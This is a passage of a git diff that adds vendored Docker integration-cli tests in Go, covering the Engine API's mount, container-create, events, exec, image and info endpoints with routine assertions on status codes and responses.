+			{mounttypes.Mount{Type: "bind", Source: tmpDir1, Target: destPath}, types.MountPoint{Type: "bind", RW: true, Destination: destPath, Source: tmpDir1}},
+			{mounttypes.Mount{Type: "bind", Source: tmpDir1, Target: destPath, ReadOnly: true}, types.MountPoint{Type: "bind", RW: false, Destination: destPath, Source: tmpDir1}},
+		}...)
+
+		// for modes only supported on Linux
+		if DaemonIsLinux.Condition() {
+			tmpDir3, err := ioutils.TempDir("", "test-mounts-api-3")
+			c.Assert(err, checker.IsNil)
+			defer os.RemoveAll(tmpDir3)
+
+			c.Assert(mount.Mount(tmpDir3, tmpDir3, "none", "bind,rw"), checker.IsNil)
+			c.Assert(mount.ForceMount("", tmpDir3, "none", "shared"), checker.IsNil)
+
+			cases = append(cases, []testCase{
+				{mounttypes.Mount{Type: "bind", Source: tmpDir3, Target: destPath}, types.MountPoint{Type: "bind", RW: true, Destination: destPath, Source: tmpDir3}},
+				{mounttypes.Mount{Type: "bind", Source: tmpDir3, Target: destPath, ReadOnly: true}, types.MountPoint{Type: "bind", RW: false, Destination: destPath, Source: tmpDir3}},
+				{mounttypes.Mount{Type: "bind", Source: tmpDir3, Target: destPath, ReadOnly: true, BindOptions: &mounttypes.BindOptions{Propagation: "shared"}}, types.MountPoint{Type: "bind", RW: false, Destination: destPath, Source: tmpDir3, Propagation: "shared"}},
+			}...)
+		}
+	}
+
+	if daemonPlatform != "windows" { // Windows does not support volume populate
+		cases = append(cases, []testCase{
+			{mounttypes.Mount{Type: "volume", Target: destPath, VolumeOptions: &mounttypes.VolumeOptions{NoCopy: true}}, types.MountPoint{Driver: volume.DefaultDriverName, Type: "volume", RW: true, Destination: destPath}},
+			{mounttypes.Mount{Type: "volume", Target: destPath + slash, VolumeOptions: &mounttypes.VolumeOptions{NoCopy: true}}, types.MountPoint{Driver: volume.DefaultDriverName, Type: "volume", RW: true, Destination: destPath}},
+			{mounttypes.Mount{Type: "volume", Target: destPath, Source: "test4", VolumeOptions: &mounttypes.VolumeOptions{NoCopy: true}}, types.MountPoint{Type: "volume", Name: "test4", RW: true, Destination: destPath}},
+			{mounttypes.Mount{Type: "volume", Target: destPath, Source: "test5", ReadOnly: true, VolumeOptions: &mounttypes.VolumeOptions{NoCopy: true}}, types.MountPoint{Type: "volume", Name: "test5", RW: false, Destination: destPath}},
+		}...)
+	}
+
+	type wrapper struct {
+		containertypes.Config
+		HostConfig containertypes.HostConfig
+	}
+	type createResp struct {
+		ID string `json:"Id"`
+	}
+	for i, x := range cases {
+		c.Logf("case %d - config: %v", i, x.cfg)
+		status, data, err := sockRequest("POST", "/containers/create", wrapper{containertypes.Config{Image: testImg}, containertypes.HostConfig{Mounts: []mounttypes.Mount{x.cfg}}})
+		c.Assert(err, checker.IsNil, check.Commentf(string(data)))
+		c.Assert(status, checker.Equals, http.StatusCreated, check.Commentf(string(data)))
+
+		var resp createResp
+		err = json.Unmarshal(data, &resp)
+		c.Assert(err, checker.IsNil, check.Commentf(string(data)))
+		id := resp.ID
+
+		var mps []types.MountPoint
+		err = json.NewDecoder(strings.NewReader(inspectFieldJSON(c, id, "Mounts"))).Decode(&mps)
+		c.Assert(err, checker.IsNil)
+		c.Assert(mps, checker.HasLen, 1)
+		c.Assert(mps[0].Destination, checker.Equals, x.expected.Destination)
+
+		if len(x.expected.Source) > 0 {
+			c.Assert(mps[0].Source, checker.Equals, x.expected.Source)
+		}
+		if len(x.expected.Name) > 0 {
+			c.Assert(mps[0].Name, checker.Equals, x.expected.Name)
+		}
+		if len(x.expected.Driver) > 0 {
+			c.Assert(mps[0].Driver, checker.Equals, x.expected.Driver)
+		}
+		c.Assert(mps[0].RW, checker.Equals, x.expected.RW)
+		c.Assert(mps[0].Type, checker.Equals, x.expected.Type)
+		c.Assert(mps[0].Mode, checker.Equals, x.expected.Mode)
+		if len(x.expected.Propagation) > 0 {
+			c.Assert(mps[0].Propagation, checker.Equals, x.expected.Propagation)
+		}
+
+		out, _, err := dockerCmdWithError("start", "-a", id)
+		if (x.cfg.Type != "volume" || (x.cfg.VolumeOptions != nil && x.cfg.VolumeOptions.NoCopy)) && daemonPlatform != "windows" {
+			c.Assert(err, checker.NotNil, check.Commentf("%s\n%v", out, mps[0]))
+		} else {
+			c.Assert(err, checker.IsNil, check.Commentf("%s\n%v", out, mps[0]))
+		}
+
+		dockerCmd(c, "rm", "-fv", id)
+		if x.cfg.Type == "volume" && len(x.cfg.Source) > 0 {
+			// This should still exist even though we removed the container
+			dockerCmd(c, "volume", "inspect", mps[0].Name)
+		} else {
+			// This should be removed automatically when we removed the container
+			out, _, err := dockerCmdWithError("volume", "inspect", mps[0].Name)
+			c.Assert(err, checker.NotNil, check.Commentf(out))
+		}
+	}
+}
+
+func (s *DockerSuite) TestContainersAPICreateMountsTmpfs(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	type testCase struct {
+		cfg             map[string]interface{}
+		expectedOptions []string
+	}
+	target := "/foo"
+	cases := []testCase{
+		{
+			cfg: map[string]interface{}{
+				"Type":   "tmpfs",
+				"Target": target},
+			expectedOptions: []string{"rw", "nosuid", "nodev", "noexec", "relatime"},
+		},
+		{
+			cfg: map[string]interface{}{
+				"Type":   "tmpfs",
+				"Target": target,
+				"TmpfsOptions": map[string]interface{}{
+					"SizeBytes": 4096 * 1024, "Mode": 0700}},
+			expectedOptions: []string{"rw", "nosuid", "nodev", "noexec", "relatime", "size=4096k", "mode=700"},
+		},
+	}
+
+	for i, x := range cases {
+		cName := fmt.Sprintf("test-tmpfs-%d", i)
+		data := map[string]interface{}{
+			"Image": "busybox",
+			"Cmd": []string{"/bin/sh", "-c",
+				fmt.Sprintf("mount | grep 'tmpfs on %s'", target)},
+			"HostConfig": map[string]interface{}{"Mounts": []map[string]interface{}{x.cfg}},
+		}
+		status, resp, err := sockRequest("POST", "/containers/create?name="+cName, data)
+		c.Assert(err, checker.IsNil, check.Commentf(string(resp)))
+		c.Assert(status, checker.Equals, http.StatusCreated, check.Commentf(string(resp)))
+		out, _ := dockerCmd(c, "start", "-a", cName)
+		for _, option := range x.expectedOptions {
+			c.Assert(out, checker.Contains, option)
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_create_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_create_test.go
new file mode 100644
index 0000000000..41011c3157
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_api_create_test.go
@@ -0,0 +1,84 @@
+package main
+
+import (
+	"net/http"
+
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+)
+
+func (s *DockerSuite) TestAPICreateWithNotExistImage(c *check.C) {
+	name := "test"
+	config := map[string]interface{}{
+		"Image":   "test456:v1",
+		"Volumes": map[string]struct{}{"/tmp": {}},
+	}
+
+	status, body, err := sockRequest("POST", "/containers/create?name="+name, config)
+	c.Assert(err, check.IsNil)
+	c.Assert(status, check.Equals, http.StatusNotFound)
+	expected := "No such image: test456:v1"
+	c.Assert(getErrorMessage(c, body), checker.Contains, expected)
+
+	config2 := map[string]interface{}{
+		"Image":   "test456",
+		"Volumes": map[string]struct{}{"/tmp": {}},
+	}
+
+	status, body, err = sockRequest("POST", "/containers/create?name="+name, config2)
+	c.Assert(err, check.IsNil)
+	c.Assert(status, check.Equals, http.StatusNotFound)
+	expected = "No such image: test456:latest"
+	c.Assert(getErrorMessage(c, body), checker.Equals, expected)
+
+	config3 := map[string]interface{}{
+		"Image": "sha256:0cb40641836c461bc97c793971d84d758371ed682042457523e4ae701efeaaaa",
+	}
+
+	status, body, err = sockRequest("POST", "/containers/create?name="+name, config3)
+	c.Assert(err, check.IsNil)
+	c.Assert(status, check.Equals, http.StatusNotFound)
+	expected = "No such image: sha256:0cb40641836c461bc97c793971d84d758371ed682042457523e4ae701efeaaaa"
+	c.Assert(getErrorMessage(c, body), checker.Equals, expected)
+
+}
+
+// Test for #25099
+func (s *DockerSuite) TestAPICreateEmptyEnv(c *check.C) {
+	name := "test1"
+	config := map[string]interface{}{
+		"Image": "busybox",
+		"Env":   []string{"", "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"},
+		"Cmd":   []string{"true"},
+	}
+
+	status, body, err := sockRequest("POST", "/containers/create?name="+name, config)
+	c.Assert(err, check.IsNil)
+	c.Assert(status, check.Equals, http.StatusInternalServerError)
+	expected := "invalid environment variable:"
+	c.Assert(getErrorMessage(c, body), checker.Contains, expected)
+
+	name = "test2"
+	config = map[string]interface{}{
+		"Image": "busybox",
+		"Env":   []string{"=", "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"},
+		"Cmd":   []string{"true"},
+	}
+	status, body, err = sockRequest("POST", "/containers/create?name="+name, config)
+	c.Assert(err, check.IsNil)
+	c.Assert(status, check.Equals, http.StatusInternalServerError)
+	expected = "invalid environment variable: ="
+	c.Assert(getErrorMessage(c, body), checker.Contains, expected)
+
+	name = "test3"
+	config = map[string]interface{}{
+		"Image": "busybox",
+		"Env":   []string{"=foo", "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"},
+		"Cmd":   []string{"true"},
+	}
+	status, body, err = sockRequest("POST", "/containers/create?name="+name, config)
+	c.Assert(err, check.IsNil)
+	c.Assert(status, check.Equals, http.StatusInternalServerError)
+	expected = "invalid environment variable: =foo"
+	c.Assert(getErrorMessage(c, body), checker.Contains, expected)
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_events_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_events_test.go
new file mode 100644
index 0000000000..3891c87379
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_api_events_test.go
@@ -0,0 +1,73 @@
+package main
+
+import (
+	"encoding/json"
+	"io"
+	"net/http"
+	"net/url"
+	"strconv"
+	"strings"
+	"time"
+
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/pkg/jsonmessage"
+	"github.com/go-check/check"
+)
+
+func (s *DockerSuite) TestEventsAPIEmptyOutput(c *check.C) {
+	type apiResp struct {
+		resp *http.Response
+		err  error
+	}
+	chResp := make(chan *apiResp)
+	go func() {
+		resp, body, err := sockRequestRaw("GET", "/events", nil, "")
+		body.Close()
+		chResp <- &apiResp{resp, err}
+	}()
+
+	select {
+	case r := <-chResp:
+		c.Assert(r.err, checker.IsNil)
+		c.Assert(r.resp.StatusCode, checker.Equals, http.StatusOK)
+	case <-time.After(3 * time.Second):
+		c.Fatal("timeout waiting for events api to respond, should have responded immediately")
+	}
+}
+
+func (s *DockerSuite) TestEventsAPIBackwardsCompatible(c *check.C) {
+	since := daemonTime(c).Unix()
+	ts := strconv.FormatInt(since, 10)
+
+	out, _ := runSleepingContainer(c, "--name=foo", "-d")
+	containerID := strings.TrimSpace(out)
+	c.Assert(waitRun(containerID), checker.IsNil)
+
+	q := url.Values{}
+	q.Set("since", ts)
+
+	_, body, err := sockRequestRaw("GET", "/events?"+q.Encode(), nil, "")
+	c.Assert(err, checker.IsNil)
+	defer body.Close()
+
+	dec := json.NewDecoder(body)
+	var containerCreateEvent *jsonmessage.JSONMessage
+	for {
+		var event jsonmessage.JSONMessage
+		if err := dec.Decode(&event); err != nil {
+			if err == io.EOF {
+				break
+			}
+			c.Fatal(err)
+		}
+		if event.Status == "create" && event.ID == containerID {
+			containerCreateEvent = &event
+			break
+		}
+	}
+
+	c.Assert(containerCreateEvent, checker.Not(checker.IsNil))
+	c.Assert(containerCreateEvent.Status, checker.Equals, "create")
+	c.Assert(containerCreateEvent.ID, checker.Equals, containerID)
+	c.Assert(containerCreateEvent.From, checker.Equals, "busybox")
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_exec_resize_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_exec_resize_test.go
new file mode 100644
index 0000000000..cf4dded483
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_api_exec_resize_test.go
@@ -0,0 +1,103 @@
+package main
+
+import (
+	"bytes"
+	"encoding/json"
+	"fmt"
+	"io"
+	"net/http"
+	"strings"
+	"sync"
+
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+)
+
+func (s *DockerSuite) TestExecResizeAPIHeightWidthNoInt(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	out, _ := dockerCmd(c, "run", "-d", "busybox", "top")
+	cleanedContainerID := strings.TrimSpace(out)
+
+	endpoint := "/exec/" + cleanedContainerID + "/resize?h=foo&w=bar"
+	status, _, err := sockRequest("POST", endpoint, nil)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusInternalServerError)
+}
+
+// Part of #14845
+func (s *DockerSuite) TestExecResizeImmediatelyAfterExecStart(c *check.C) {
+	name := "exec_resize_test"
+	dockerCmd(c, "run", "-d", "-i", "-t", "--name", name, "--restart", "always", "busybox", "/bin/sh")
+
+	testExecResize := func() error {
+		data := map[string]interface{}{
+			"AttachStdin": true,
+			"Cmd":         []string{"/bin/sh"},
+		}
+		uri := fmt.Sprintf("/containers/%s/exec", name)
+		status, body, err := sockRequest("POST", uri, data)
+		if err != nil {
+			return err
+		}
+		if status != http.StatusCreated {
+			return fmt.Errorf("POST %s is expected to return %d, got %d", uri, http.StatusCreated, status)
+		}
+
+		out := map[string]string{}
+		err = json.Unmarshal(body, &out)
+		if err != nil {
+			return fmt.Errorf("ExecCreate returned invalid json. Error: %q", err.Error())
+		}
+
+		execID := out["Id"]
+		if len(execID) < 1 {
+			return fmt.Errorf("ExecCreate got invalid execID")
+		}
+
+		payload := bytes.NewBufferString(`{"Tty":true}`)
+		conn, _, err := sockRequestHijack("POST", fmt.Sprintf("/exec/%s/start", execID), payload, "application/json")
+		if err != nil {
+			return fmt.Errorf("Failed to start the exec: %q", err.Error())
+		}
+		defer conn.Close()
+
+		_, rc, err := sockRequestRaw("POST", fmt.Sprintf("/exec/%s/resize?h=24&w=80", execID), nil, "text/plain")
+		// It's probably a panic of the daemon if io.ErrUnexpectedEOF is returned.
+		if err == io.ErrUnexpectedEOF {
+			return fmt.Errorf("The daemon might have crashed.")
+		}
+
+		if err == nil {
+			rc.Close()
+		}
+
+		// We only interested in the io.ErrUnexpectedEOF error, so we return nil otherwise.
+		return nil
+	}
+
+	// The panic happens when daemon.ContainerExecStart is called but the
+	// container.Exec is not called.
+	// Because the panic is not 100% reproducible, we send the requests concurrently
+	// to increase the probability that the problem is triggered.
+	var (
+		n  = 10
+		ch = make(chan error, n)
+		wg sync.WaitGroup
+	)
+	for i := 0; i < n; i++ {
+		wg.Add(1)
+		go func() {
+			defer wg.Done()
+			if err := testExecResize(); err != nil {
+				ch <- err
+			}
+		}()
+	}
+
+	wg.Wait()
+	select {
+	case err := <-ch:
+		c.Fatal(err.Error())
+	default:
+	}
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_exec_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_exec_test.go
new file mode 100644
index 0000000000..716e9ac68f
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_api_exec_test.go
@@ -0,0 +1,198 @@
+// +build !test_no_exec
+
+package main
+
+import (
+	"bytes"
+	"encoding/json"
+	"fmt"
+	"net/http"
+	"strings"
+	"time"
+
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+)
+
+// Regression test for #9414
+func (s *DockerSuite) TestExecAPICreateNoCmd(c *check.C) {
+	name := "exec_test"
+	dockerCmd(c, "run", "-d", "-t", "--name", name, "busybox", "/bin/sh")
+
+	status, body, err := sockRequest("POST", fmt.Sprintf("/containers/%s/exec", name), map[string]interface{}{"Cmd": nil})
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusInternalServerError)
+
+	comment := check.Commentf("Expected message when creating exec command with no Cmd specified")
+	c.Assert(getErrorMessage(c, body), checker.Contains, "No exec command specified", comment)
+}
+
+func (s *DockerSuite) TestExecAPICreateNoValidContentType(c *check.C) {
+	name := "exec_test"
+	dockerCmd(c, "run", "-d", "-t", "--name", name, "busybox", "/bin/sh")
+
+	jsonData := bytes.NewBuffer(nil)
+	if err := json.NewEncoder(jsonData).Encode(map[string]interface{}{"Cmd": nil}); err != nil {
+		c.Fatalf("Can not encode data to json %s", err)
+	}
+
+	res, body, err := sockRequestRaw("POST", fmt.Sprintf("/containers/%s/exec", name), jsonData, "text/plain")
+	c.Assert(err, checker.IsNil)
+	c.Assert(res.StatusCode, checker.Equals, http.StatusInternalServerError)
+
+	b, err := readBody(body)
+	c.Assert(err, checker.IsNil)
+
+	comment := check.Commentf("Expected message when creating exec command with invalid Content-Type specified")
+	c.Assert(getErrorMessage(c, b), checker.Contains, "Content-Type specified", comment)
+}
+
+func (s *DockerSuite) TestExecAPICreateContainerPaused(c *check.C) {
+	// Not relevant on Windows as Windows containers cannot be paused
+	testRequires(c, DaemonIsLinux)
+	name := "exec_create_test"
+	dockerCmd(c, "run", "-d", "-t", "--name", name, "busybox", "/bin/sh")
+
+	dockerCmd(c, "pause", name)
+	status, body, err := sockRequest("POST", fmt.Sprintf("/containers/%s/exec", name), map[string]interface{}{"Cmd": []string{"true"}})
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusConflict)
+
+	comment := check.Commentf("Expected message when creating exec command with Container %s is paused", name)
+	c.Assert(getErrorMessage(c, body), checker.Contains, "Container "+name+" is paused, unpause the container before exec", comment)
+}
+
+func (s *DockerSuite) TestExecAPIStart(c *check.C) {
+	testRequires(c, DaemonIsLinux) // Uses pause/unpause but bits may be salvagable to Windows to Windows CI
+	dockerCmd(c, "run", "-d", "--name", "test", "busybox", "top")
+
+	id := createExec(c, "test")
+	startExec(c, id, http.StatusOK)
+
+	var execJSON struct{ PID int }
+	inspectExec(c, id, &execJSON)
+	c.Assert(execJSON.PID, checker.GreaterThan, 1)
+
+	id = createExec(c, "test")
+	dockerCmd(c, "stop", "test")
+
+	startExec(c, id, http.StatusNotFound)
+
+	dockerCmd(c, "start", "test")
+	startExec(c, id, http.StatusNotFound)
+
+	// make sure exec is created before pausing
+	id = createExec(c, "test")
+	dockerCmd(c, "pause", "test")
+	startExec(c, id, http.StatusConflict)
+	dockerCmd(c, "unpause", "test")
+	startExec(c, id, http.StatusOK)
+}
+
+func (s *DockerSuite) TestExecAPIStartEnsureHeaders(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	dockerCmd(c, "run", "-d", "--name", "test", "busybox", "top")
+
+	id := createExec(c, "test")
+	resp, _, err := sockRequestRaw("POST", fmt.Sprintf("/exec/%s/start", id), strings.NewReader(`{"Detach": true}`), "application/json")
+	c.Assert(err, checker.IsNil)
+	c.Assert(resp.Header.Get("Server"), checker.Not(checker.Equals), "")
+}
+
+func (s *DockerSuite) TestExecAPIStartBackwardsCompatible(c *check.C) {
+	testRequires(c, DaemonIsLinux) // Windows only supports 1.25 or later
+	runSleepingContainer(c, "-d", "--name", "test")
+	id := createExec(c, "test")
+
+	resp, body, err := sockRequestRaw("POST", fmt.Sprintf("/v1.20/exec/%s/start", id), strings.NewReader(`{"Detach": true}`), "text/plain")
+	c.Assert(err, checker.IsNil)
+
+	b, err := readBody(body)
+	comment := check.Commentf("response body: %s", b)
+	c.Assert(err, checker.IsNil, comment)
+	c.Assert(resp.StatusCode, checker.Equals, http.StatusOK, comment)
+}
+
+// #19362
+func (s *DockerSuite) TestExecAPIStartMultipleTimesError(c *check.C) {
+	runSleepingContainer(c, "-d", "--name", "test")
+	execID := createExec(c, "test")
+	startExec(c, execID, http.StatusOK)
+
+	timeout := time.After(60 * time.Second)
+	var execJSON struct{ Running bool }
+	for {
+		select {
+		case <-timeout:
+			c.Fatal("timeout waiting for exec to start")
+		default:
+		}
+
+		inspectExec(c, execID, &execJSON)
+		if !execJSON.Running {
+			break
+		}
+	}
+
+	startExec(c, execID, http.StatusConflict)
+}
+
+// #20638
+func (s *DockerSuite) TestExecAPIStartWithDetach(c *check.C) {
+	name := "foo"
+	runSleepingContainer(c, "-d", "-t", "--name", name)
+	data := map[string]interface{}{
+		"cmd":         []string{"true"},
+		"AttachStdin": true,
+	}
+	_, b, err := sockRequest("POST", fmt.Sprintf("/containers/%s/exec", name), data)
+	c.Assert(err, checker.IsNil, check.Commentf(string(b)))
+
+	createResp := struct {
+		ID string `json:"Id"`
+	}{}
+	c.Assert(json.Unmarshal(b, &createResp), checker.IsNil, check.Commentf(string(b)))
+
+	_, body, err := sockRequestRaw("POST", fmt.Sprintf("/exec/%s/start", createResp.ID), strings.NewReader(`{"Detach": true}`), "application/json")
+	c.Assert(err, checker.IsNil)
+
+	b, err = readBody(body)
+	comment := check.Commentf("response body: %s", b)
+	c.Assert(err, checker.IsNil, comment)
+
+	resp, _, err := sockRequestRaw("GET", "/_ping", nil, "")
+	c.Assert(err, checker.IsNil)
+	if resp.StatusCode != http.StatusOK {
+		c.Fatal("daemon is down, it should alive")
+	}
+}
+
+func createExec(c *check.C, name string) string {
+	_, b, err := sockRequest("POST", fmt.Sprintf("/containers/%s/exec", name), map[string]interface{}{"Cmd": []string{"true"}})
+	c.Assert(err, checker.IsNil, check.Commentf(string(b)))
+
+	createResp := struct {
+		ID string `json:"Id"`
+	}{}
+	c.Assert(json.Unmarshal(b, &createResp), checker.IsNil, check.Commentf(string(b)))
+	return createResp.ID
+}
+
+func startExec(c *check.C, id string, code int) {
+	resp, body, err := sockRequestRaw("POST", fmt.Sprintf("/exec/%s/start", id), strings.NewReader(`{"Detach": true}`), "application/json")
+	c.Assert(err, checker.IsNil)
+
+	b, err := readBody(body)
+	comment := check.Commentf("response body: %s", b)
+	c.Assert(err, checker.IsNil, comment)
+	c.Assert(resp.StatusCode, checker.Equals, code, comment)
+}
+
+func inspectExec(c *check.C, id string, out interface{}) {
+	resp, body, err := sockRequestRaw("GET", fmt.Sprintf("/exec/%s/json", id), nil, "")
+	c.Assert(err, checker.IsNil)
+	defer body.Close()
+	c.Assert(resp.StatusCode, checker.Equals, http.StatusOK)
+	err = json.NewDecoder(body).Decode(out)
+	c.Assert(err, checker.IsNil)
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_images_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_images_test.go
new file mode 100644
index 0000000000..b7617eae25
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_api_images_test.go
@@ -0,0 +1,165 @@
+package main
+
+import (
+	"encoding/json"
+	"net/http"
+	"net/url"
+	"strings"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+)
+
+func (s *DockerSuite) TestAPIImagesFilter(c *check.C) {
+	name := "utest:tag1"
+	name2 := "utest/docker:tag2"
+	name3 := "utest:5000/docker:tag3"
+	for _, n := range []string{name, name2, name3} {
+		dockerCmd(c, "tag", "busybox", n)
+	}
+	type image types.ImageSummary
+	getImages := func(filter string) []image {
+		v := url.Values{}
+		v.Set("filter", filter)
+		status, b, err := sockRequest("GET", "/images/json?"+v.Encode(), nil)
+		c.Assert(err, checker.IsNil)
+		c.Assert(status, checker.Equals, http.StatusOK)
+
+		var images []image
+		err = json.Unmarshal(b, &images)
+		c.Assert(err, checker.IsNil)
+
+		return images
+	}
+
+	//incorrect number of matches returned
+	images := getImages("utest*/*")
+	c.Assert(images[0].RepoTags, checker.HasLen, 2)
+
+	images = getImages("utest")
+	c.Assert(images[0].RepoTags, checker.HasLen, 1)
+
+	images = getImages("utest*")
+	c.Assert(images[0].RepoTags, checker.HasLen, 1)
+
+	images = getImages("*5000*/*")
+	c.Assert(images[0].RepoTags, checker.HasLen, 1)
+}
+
+func (s *DockerSuite) TestAPIImagesSaveAndLoad(c *check.C) {
+	// TODO Windows to Windows CI: Investigate further why this test fails.
+	testRequires(c, Network)
+	testRequires(c, DaemonIsLinux)
+	out, err := buildImage("saveandload", "FROM busybox\nENV FOO bar", false)
+	c.Assert(err, checker.IsNil)
+	id := strings.TrimSpace(out)
+
+	res, body, err := sockRequestRaw("GET", "/images/"+id+"/get", nil, "")
+	c.Assert(err, checker.IsNil)
+	defer body.Close()
+	c.Assert(res.StatusCode, checker.Equals, http.StatusOK)
+
+	dockerCmd(c, "rmi", id)
+
+	res, loadBody, err := sockRequestRaw("POST", "/images/load", body, "application/x-tar")
+	c.Assert(err, checker.IsNil)
+	defer loadBody.Close()
+	c.Assert(res.StatusCode, checker.Equals, http.StatusOK)
+
+	inspectOut := inspectField(c, id, "Id")
+	c.Assert(strings.TrimSpace(string(inspectOut)), checker.Equals, id, check.Commentf("load did not work properly"))
+}
+
+func (s *DockerSuite) TestAPIImagesDelete(c *check.C) {
+	if daemonPlatform != "windows" {
+		testRequires(c, Network)
+	}
+	name := "test-api-images-delete"
+	out, err := buildImage(name, "FROM busybox\nENV FOO bar", false)
+	c.Assert(err, checker.IsNil)
+	id := strings.TrimSpace(out)
+
+	dockerCmd(c, "tag", name, "test:tag1")
+
+	status, _, err := sockRequest("DELETE", "/images/"+id, nil)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusConflict)
+
+	status, _, err = sockRequest("DELETE", "/images/test:noexist", nil)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusNotFound) //Status Codes:404 – no such image
+
+	status, _, err = sockRequest("DELETE", "/images/test:tag1", nil)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusOK)
+}
+
+func (s *DockerSuite) TestAPIImagesHistory(c *check.C) {
+	if daemonPlatform != "windows" {
+		testRequires(c, Network)
+	}
+	name := "test-api-images-history"
+	out, err := buildImage(name, "FROM busybox\nENV FOO bar", false)
+	c.Assert(err, checker.IsNil)
+
+	id := strings.TrimSpace(out)
+
+	status, body, err := sockRequest("GET", "/images/"+id+"/history", nil)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusOK)
+
+	var historydata []types.ImageHistory
+	err = json.Unmarshal(body, &historydata)
+	c.Assert(err, checker.IsNil, check.Commentf("Error on unmarshal"))
+
+	c.Assert(historydata, checker.Not(checker.HasLen), 0)
+	c.Assert(historydata[0].Tags[0], checker.Equals, "test-api-images-history:latest")
+}
+
+// #14846
+func (s *DockerSuite) TestAPIImagesSearchJSONContentType(c *check.C) {
+	testRequires(c, Network)
+
+	res, b, err := sockRequestRaw("GET", "/images/search?term=test", nil, "application/json")
+	c.Assert(err, check.IsNil)
+	b.Close()
+	c.Assert(res.StatusCode, checker.Equals, http.StatusOK)
+	c.Assert(res.Header.Get("Content-Type"), checker.Equals, "application/json")
+}
+
+// Test case for 30027: image size reported as -1 in v1.12 client against v1.13 daemon.
+// This test checks to make sure both v1.12 and v1.13 client against v1.13 daemon get correct `Size` after the fix.
+func (s *DockerSuite) TestAPIImagesSizeCompatibility(c *check.C) {
+	status, b, err := sockRequest("GET", "/images/json", nil)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusOK)
+	var images []types.ImageSummary
+	err = json.Unmarshal(b, &images)
+	c.Assert(err, checker.IsNil)
+	c.Assert(len(images), checker.Not(checker.Equals), 0)
+	for _, image := range images {
+		c.Assert(image.Size, checker.Not(checker.Equals), int64(-1))
+	}
+
+	type v124Image struct {
+		ID          string `json:"Id"`
+		ParentID    string `json:"ParentId"`
+		RepoTags    []string
+		RepoDigests []string
+		Created     int64
+		Size        int64
+		VirtualSize int64
+		Labels      map[string]string
+	}
+	status, b, err = sockRequest("GET", "/v1.24/images/json", nil)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusOK)
+	var v124Images []v124Image
+	err = json.Unmarshal(b, &v124Images)
+	c.Assert(err, checker.IsNil)
+	c.Assert(len(v124Images), checker.Not(checker.Equals), 0)
+	for _, image := range v124Images {
+		c.Assert(image.Size, checker.Not(checker.Equals), int64(-1))
+	}
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_info_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_info_test.go
new file mode 100644
index 0000000000..1556099734
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_api_info_test.go
@@ -0,0 +1,53 @@
+package main
+
+import (
+	"net/http"
+
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+)
+
+func (s *DockerSuite) TestInfoAPI(c *check.C) {
+	endpoint := "/info"
+
+	status, body, err := sockRequest("GET", endpoint, nil)
+	c.Assert(status, checker.Equals, http.StatusOK)
+	c.Assert(err, checker.IsNil)
+
+	// always shown fields
+	stringsToCheck := []string{
+		"ID",
+		"Containers",
+		"ContainersRunning",
+		"ContainersPaused",
+		"ContainersStopped",
+		"Images",
+		"LoggingDriver",
+		"OperatingSystem",
+		"NCPU",
+		"OSType",
+		"Architecture",
+		"MemTotal",
+		"KernelVersion",
+		"Driver",
+		"ServerVersion",
+		"SecurityOptions"}
+
+	out := string(body)
+	for _, linePrefix := range stringsToCheck {
+		c.Assert(out, checker.Contains, linePrefix)
+	}
+}
+
+func (s *DockerSuite) TestInfoAPIVersioned(c *check.C) {
+	testRequires(c, DaemonIsLinux) // Windows only supports 1.25 or later
+	endpoint := "/v1.20/info"
+
+	status, body, err := sockRequest("GET", endpoint, nil)
+	c.Assert(status, checker.Equals, http.StatusOK)
+	c.Assert(err, checker.IsNil)
+
+	out := string(body)
+	c.Assert(out, checker.Contains, "ExecutionDriver")
+	c.Assert(out, checker.Contains, "not supported")
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_inspect_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_inspect_test.go
new file mode 100644
index 0000000000..546b224c92
